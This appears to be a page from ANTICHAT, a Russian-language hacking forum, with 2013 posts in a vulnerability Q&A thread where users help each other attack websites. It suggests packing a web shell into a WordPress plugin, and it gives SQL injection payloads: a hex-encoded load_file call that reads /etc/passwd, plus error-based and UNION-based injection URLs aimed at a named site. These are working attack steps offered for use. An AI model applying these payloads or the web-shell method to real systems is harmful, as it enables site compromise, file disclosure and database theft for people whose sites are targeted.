HOME    FORUMS    MEMBERS    RECENT POSTS    LOG IN  
Баннер 1   Баннер 2

ANTICHAT — форум по информационной безопасности, OSINT и технологиям

ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию. Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club, и теперь снова доступен на новом адресе — forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
Вернуться   Форум АНТИЧАТ > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Уязвимости
Перезагрузить страницу Ваши вопросы по уязвимостям.
   
Ответ
Страница 2295 из 2438 « Первая < 12951795219522452285 2291 2292 2293 2294 2295 2296 2297 2298 2299 230523452395 > Последняя »
 
Опции темы Поиск в этой теме Опции просмотра

  #22941  
Старый 29.10.2013, 23:30
qaz
Guest
Сообщений: n/a
Провел на форуме:
344922

Репутация: 75
По умолчанию
несилён в ворд прессе, короче нет прав на запись, где в админке можно влепить хтмл код чтобы он на всех страницах отобразился?
 
Ответить с цитированием

  #22942  
Старый 30.10.2013, 00:11
Ravenous
Guest
Сообщений: n/a
Провел на форуме:
44130

Репутация: 26
По умолчанию
Цитата:
Сообщение от qaz  
qaz said:
несилён в ворд прессе, короче нет прав на запись, где в админке можно влепить хтмл код чтобы он на всех страницах отобразился?
Через ред. шаблонов/тем. Но шаблоны хранятся в файловой системе, поэтому если нет прав на запись,то увы, нигде(если хочешь на всех).
 
Ответить с цитированием

  #22943  
Старый 30.10.2013, 00:58
er9j6@
Guest
Сообщений: n/a
Провел на форуме:
107835

Репутация: 23
По умолчанию
Цитата:
Сообщение от qaz  
qaz said:
несилён в ворд прессе, короче нет прав на запись, где в админке можно влепить хтмл код чтобы он на всех страницах отобразился?
в плагин шелл запакуй, если есть возможность загрузки на сайт
 
Ответить с цитированием

  #22944  
Старый 31.10.2013, 15:36
Br@!ns
Guest
Сообщений: n/a
Провел на форуме:
179197

Репутация: 25
По умолчанию
Как Havij проводит load_file? через программку /etc/passwd выводит норм, а вручную вывести что то неполучается
 
Ответить с цитированием

  #22945  
Старый 31.10.2013, 15:56
YaBtr
Guest
Сообщений: n/a
Провел на форуме:
132418

Репутация: 652
По умолчанию
Цитата:
Сообщение от Br@!ns  
Br@!ns said:
Как Havij проводит load_file? через программку /etc/passwd выводит норм, а вручную вывести что то неполучается
Не знаю, как Havij, но, если у тебя mg=on, то load_file('/etc/passwd'), сам понимаешь, не пройдет. Здесь выручает hex: load_file(0x2f6574632f706173737764)
 
Ответить с цитированием

  #22946  
Старый 31.10.2013, 16:13
Br@!ns
Guest
Сообщений: n/a
Провел на форуме:
179197

Репутация: 25
По умолчанию
Цитата:
Сообщение от YaBtr  
YaBtr said:
Не знаю, как Havij, но, если у тебя mg=on, то load_file('/etc/passwd'), сам понимаешь, не пройдет. Здесь выручает hex:
load_file(0x2f6574632f706173737764)
При обоих вариантах получаю CDbCommand не удалось исполнить SQL-запрос: SQLSTATE[42000]: Syntax error or access violation: 1305 FUNCTION db_name.loаd_file does not exist. до этого что то делал получал пустую страничку. В это же время Havij показывает и показывал все без проблем, вот и интересно, что он делает и как
 
Ответить с цитированием

  #22947  
Старый 31.10.2013, 16:22
YaBtr
Guest
Сообщений: n/a
Провел на форуме:
132418

Репутация: 652
По умолчанию
Цитата:
Сообщение от Br@!ns  
Br@!ns said:
При обоих вариантах получаю CDbCommand не удалось исполнить SQL-запрос: SQLSTATE[42000]: Syntax error or access violation: 1305 FUNCTION db_name.loаd_file does not exist. до этого что то делал получал пустую страничку. В это же время Havij показывает и показывал все без проблем, вот и интересно, что он делает и как
Если выводится пустая страница, смотри source страницы, зачастую там выводится.
 
Ответить с цитированием

  #22948  
Старый 31.10.2013, 21:39
Unknowhacker
Guest
Сообщений: n/a
Провел на форуме:
94006

Репутация: 24
По умолчанию
При единичном параметре пишет Unknown column '1' in 'order clause' http://www.friendlytarget.com/index.php?game=16%27+order+by+1+--+ что делать
 
Ответить с цитированием

  #22949  
Старый 31.10.2013, 22:09
qaz
Guest
Сообщений: n/a
Провел на форуме:
344922

Репутация: 75
По умолчанию
Цитата:
Сообщение от Unknowhacker  
Unknowhacker said:
При единичном параметре пишет Unknown column '1' in 'order clause' http://www.friendlytarget.com/index.php?game=16%27+order+by+1+--+ что делать
а в чём собственно проблема?

Цитата:
Сообщение от None  
http://www.friendlytarget.com/index.php?game=16%27+or+1+group+by+concat%28%28sel ect+version%28%29%29,0x00,floor%28rand%280%29*2%29 %29having+min%280%29+or+1--+
 
Ответить с цитированием

  #22950  
Старый 01.11.2013, 14:30
YaBtr
Guest
Сообщений: n/a
Провел на форуме:
132418

Репутация: 652
По умолчанию
Цитата:
Сообщение от Unknowhacker  
Unknowhacker said:
При единичном параметре пишет Unknown column '1' in 'order clause' http://www.friendlytarget.com/index.php?game=16%27+order+by+1+--+ что делать
Ситуация, когда один и тот же параметр учавствет в нескольких запросах: тыц

Union'ом можно крутить на другом уязвимом параметре:

Цитата:
Сообщение от None  
www.friendlytarget.com/index.php?
type
=Action games'+union+select+1,2,version(),4,5,6,7,8+--+
 
Ответить с цитированием
Ответ
Страница 2295 из 2438 « Первая < 12951795219522452285 2291 2292 2293 2294 2295 2296 2297 2298 2299 230523452395 > Последняя »



« Предыдущая тема | Следующая тема »
Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
Ваши ламерские приколы (Ну когда только комп появился) PEPSICOLA Болталка 188 23.05.2010 10:05
Ваши любимые компьютерные игры PEPSICOLA Болталка 280 19.08.2009 00:01
Ваши телеги... F-IFTY Болталка 13 18.08.2009 18:22
Вопросы по Ipb 2.0 Voodoo_People Уязвимости CMS / форумов 26 15.02.2005 22:57



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT.XYZ